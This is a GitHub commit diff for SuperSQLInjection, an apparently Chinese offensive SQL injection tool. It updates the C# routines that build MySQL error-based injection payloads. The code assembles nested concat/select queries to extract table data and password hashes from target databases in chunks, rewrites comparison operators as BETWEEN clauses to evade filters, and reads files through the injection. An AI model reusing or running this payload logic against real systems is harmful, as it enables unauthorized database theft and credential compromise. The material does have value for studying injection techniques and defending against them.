Skip to content

Commit

Permalink
20181206
Browse files Browse the repository at this point in the history 
20181206 V1.0 正式版---
修改mysql获取的环境的配置文件,增加hash字段名为authentication_string的查询。
修复使用了betweent and饶过时,显错注入无法获取数据的情况。
修复MySQL显错注入,获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。
  • Loading branch information
@shack2
shack2 committed Dec 6, 2018
1 parent 337f7ed commit d27a7b1
Show file tree
Hide file tree
Showing 2 changed files with 128 additions and 56 deletions.
89 changes: 43 additions & 46 deletions SuperSQLInjection/Main.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -230,7 +230,7 @@ public static String getSid()
return sid;
}

public static int version = 20181205;
public static int version = 20181206;
public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(getSid()) + "&VERSION=" + version;
//检查更新
public void checkUpdate()
Expand Down Expand Up @@ -1760,32 +1760,28 @@ public void addNodeToTreeList(TreeNode tn, String text, String type)
private String ByPassForBetween(String paylaod, int len)
{

String newpayload = "";
if (config.useBetweenByPass == false)
String newpayload = paylaod.Replace("{len}", len + "");
if(config.useBetweenByPass)
{
newpayload = paylaod.Replace("{len}", len + "");
}
else
{
paylaod = paylaod.Replace("{len}", "");
if (paylaod.IndexOf(">=") != -1)

if (newpayload.IndexOf(">=") != -1)
{
newpayload = paylaod.Replace(">=", " not between 0 and " + (len - 1));
newpayload = newpayload.Replace(">=", " not between 0 and " + (len - 1));
}
else if (paylaod.IndexOf(">") != -1)
else if (newpayload.IndexOf(">") != -1)
{
newpayload = paylaod.Replace(">", " not between 0 and " + len);
newpayload = newpayload.Replace(">", " not between 0 and " + len);
}
else if (paylaod.IndexOf("=") != -1)
else if (newpayload.IndexOf("=") != -1)
{
newpayload = paylaod.Replace("=", " between " + len + " and " + len);
newpayload = newpayload.Replace("=", " between " + len + " and " + len);
}
else if (paylaod.IndexOf("<") != -1)
{
newpayload = paylaod.Replace("<", " between 0 and " + len);
}

newpayload = newpayload.Replace("<", " between 0 and " + len);
}
}

return newpayload;
}

Expand Down Expand Up @@ -3862,44 +3858,45 @@ public void getDataValueByErrorByMySQL(Object opam)
try
{
GetDataPam gp = (GetDataPam)opam;
//获取数据长度

ListViewItem lvi = null;
foreach (String column in gp.columns)
{
//获取数据长度
String datas_payload_columns = MySQL.hex_value.Replace("{data}", MySQL.creatMySQLColumnsNoConcatStr(gp.columns, gp.table, gp.dbname, gp.limit));
String datas_payload_length = MySQL.concatMySQLColumn(MySQL.char_length.Replace("{data}", datas_payload_columns));

String datas_payload_columns = MySQL.creatMySQLColumnStr(column);
String datas_payload_length = MySQL.char_length.Replace("{data}", "(select " + datas_payload_columns + " from " + gp.dbname + "." + gp.table + " limit " + gp.limit + ",1)");
String datas_payload_length_error = MySQL.error_value.Replace("{data}", datas_payload_length);

String d_l_e = MySQL.creatMySQLColumnStr("(" + datas_payload_length + ")");
String datas_payload_length_error = MySQL.error_value.Replace("{data}", d_l_e);
String result_length = getOneDataByUnionOrError(datas_payload_length_error);

String result_length = getOneDataByUnionOrError(datas_payload_length_error);
int sumlen = Tools.convertToInt(result_length);

int sumlen = Tools.convertToInt(result_length);
String datas_value_payload = "(select " + MySQL.creatMySQLColumnsStrByError(column, gp.table, gp.dbname, gp.limit) + ")";
String result = "";
int start = 1;
//每次获取长度,err方式有长度限制
int count = 64 - 6;
this.Invoke(new showLogDelegate(log), "报告大侠,正在获取数据,每次请求将获取" + count + "字符!", LogLevel.info);
while (start < sumlen)
{
//hex编码,防止中文等乱码
String datas_value_column = ByPassForBetween(MySQL.substr_value.Replace("{data}", datas_value_payload).Replace("{start}", start.ToString()), count);
String c_datas_value_payload = MySQL.error_value.Replace("{data}", datas_value_column);
result += getOneDataByUnionOrError(c_datas_value_payload);
start += count;
}
String result = "";
int start = 1;
//每次获取长度,err方式有长度限制59个字符
int count = 64 - 6;
this.Invoke(new showLogDelegate(log), "报告大侠,正在获取数据,每次请求将获取" + count + "字符!", LogLevel.info);
while (start < sumlen)
{
//hex编码,防止中文等乱码
String datas_value_column = ByPassForBetween(MySQL.substr_value.Replace("{data}", datas_payload_columns).Replace("{start}", start.ToString()), count);
String c_datas_value_payload = MySQL.error_value.Replace("{data}", MySQL.concatMySQLColumn(datas_value_column));
result += getOneDataByUnionOrError(c_datas_value_payload);
start += count;
}

result = Tools.unHex(result, "UTF-8");
String[] items = Regex.Split(result, "\\$\\$\\$");
ListViewItem lvi = null;
foreach (String item in items)
{
if (lvi == null)
{
lvi = new ListViewItem(result);

lvi = new ListViewItem(item);
}
else
{
lvi.SubItems.Add(result);
lvi.SubItems.Add(item);
}

}
this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
this.Invoke(new showLogDelegate(log), "获取到第" + (gp.limit + 1) + "行的值!", LogLevel.info);
Expand Down Expand Up @@ -5739,7 +5736,7 @@ public void readOrWriteFile()
try
{
String payload_len = MySQL.char_length.Replace("{data}", data_payload);
String payload_len_error = MySQL.error_value.Replace("{data}", MySQL.creatMySQLColumnStr(payload_len));
String payload_len_error = MySQL.error_value.Replace("{data}", MySQL.concatMySQLColumn(payload_len));

String result_length = getOneDataByUnionOrError(payload_len_error);

Expand All @@ -5755,7 +5752,7 @@ public void readOrWriteFile()
while (start < sumlen)
{
//hex编码,防止中文等乱码
String datas_value_tmp = ByPassForBetween(MySQL.creatMySQLColumnStr(MySQL.substr_value.Replace("{data}", data_payload).Replace("{start}", start.ToString())), count);
String datas_value_tmp = ByPassForBetween(MySQL.creatMySQLColumnCastStr(MySQL.substr_value.Replace("{data}", data_payload).Replace("{start}", start.ToString())), count);
String c_datas_value_payload = MySQL.error_value.Replace("{data}", datas_value_tmp);
result += getOneDataByUnionOrError(c_datas_value_payload);
start += count;
Expand Down
95 changes: 85 additions & 10 deletions SuperSQLInjection/payload/MySQL.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -106,7 +106,7 @@ public static String creatMySQLColumnsStrByUnion(int columnsLen, int showIndex,

if (i == showIndex)
{
sb.Append(creatMySQLColumnStr(columns) + ",");
sb.Append(concatMySQLColumnStr(columns) + ",");
}
else
{
Expand Down Expand Up @@ -148,7 +148,7 @@ public static String creatMySQLReadFileByUnion(int columnsLen, int showIndex,Str

if (i == showIndex)
{
sb.Append(creatMySQLColumnStr(data) + ",");
sb.Append(concatMySQLColumn(data) + ",");
}
else
{
Expand Down Expand Up @@ -188,7 +188,7 @@ public static String creatMySQLWriteFileByUnionByMuSQL(String path, String conte
public static String creatMySQLColumnsStrByError(List<String> columns, String table, String dbName, int limit)
{
StringBuilder sb = new StringBuilder();
sb.Append(creatMySQLColumnStr(columns));
sb.Append(concatMySQLColumnStr(columns));

if (!Tools.checkEmpty(dbName))
{
Expand Down Expand Up @@ -216,8 +216,14 @@ public static String creatMySQLColumnsStrByError(List<String> columns, String ta

public static String creatMySQLColumnsStrByError(String column, String table, String dbName, int limit)
{
StringBuilder sb = new StringBuilder();
sb.Append(creatMySQLColumnStr(column));
List<String> List = new List<String>();
List.Add(column);
return creatMySQLColumnsStrByError(List, table, dbName, limit);
}
public static String creatMySQLColumnsHexStrByError(String column, String table, String dbName, int limit)
{
StringBuilder sb = new StringBuilder("(select ");
sb.Append(creatMySQLColumnHexStr(column));

if (!Tools.checkEmpty(dbName))
{
Expand All @@ -236,31 +242,68 @@ public static String creatMySQLColumnsStrByError(String column, String table, St
}
if (limit >= 0)
{
sb.Append(" limit " + limit + ",1");
sb.Append(" limit " + limit + ",1)");

}
return sb.ToString();
}

public static String creatMySQLColumnsNoConcatStr(List<String> columns, String table, String dbName, int limit)
{


StringBuilder sb = new StringBuilder("(select concat(");
foreach (String c in columns) {
sb.Append(c + ",0x242424,");
}
if (columns.Count > 0)
{
sb.Remove(sb.Length - 10, 10);
}
sb.Append(")");
if (!Tools.checkEmpty(dbName))
{
sb.Append(" from " + dbName + ".");
if (!Tools.checkEmpty(table))
{
sb.Append(table);
}
}
else
{
if (!Tools.checkEmpty(table))
{
sb.Append(" from " + table);
}
}
if (limit >= 0)
{
sb.Append(" limit " + limit + ",1)");

}
return sb.ToString();
}




/// <summary>
/// 生成查询列数据
/// </summary>
/// <param name="columns">列明</param>
/// <returns></returns>
public static String creatMySQLColumnStr(List<String> columns)
public static String concatMySQLColumnStr(List<String> columns)
{
StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
for (int i = 0; i < columns.Count; i++)
{
if (columns.Count > 1)
{
sb.Append("ifnull(cast(" + columns[i] + " as char),0x20),0x242424,");
sb.Append(columns[i]+",0x242424,");
}
else
{
return creatMySQLColumnStr(columns[i]);
return concatMySQLColumn(columns[i]);
}

}
Expand All @@ -275,12 +318,13 @@ public static String creatMySQLColumnStr(List<String> columns)
}



/// <summary>
/// 生成查询列数据
/// </summary>
/// <param name="columns">列明</param>
/// <returns></returns>
public static String creatMySQLColumnStr(String column)
public static String concatMySQLColumn(String column)
{
StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
sb.Append(column);
Expand All @@ -289,5 +333,36 @@ public static String creatMySQLColumnStr(String column)

}

/// <summary>
/// 生成查询列数据
/// </summary>
/// <param name="columns">列明</param>
/// <returns></returns>
public static String creatMySQLColumnCastStr(String column)
{
StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
sb.Append("ifnull(cast(" + column + " as char),0x20)");
sb.Append(",0x215e5e)");
return sb.ToString();

}

/// <summary>
/// 生成查询列数据
/// </summary>
/// <param name="columns">列明</param>
/// <returns></returns>
public static String creatMySQLColumnHexStr(String column)
{
StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
sb.Append(hex_value.Replace("{data}",column));
sb.Append(",0x215e5e)");
return sb.ToString();

}




}
}

0 comments on commit d27a7b1

Please sign in to comment.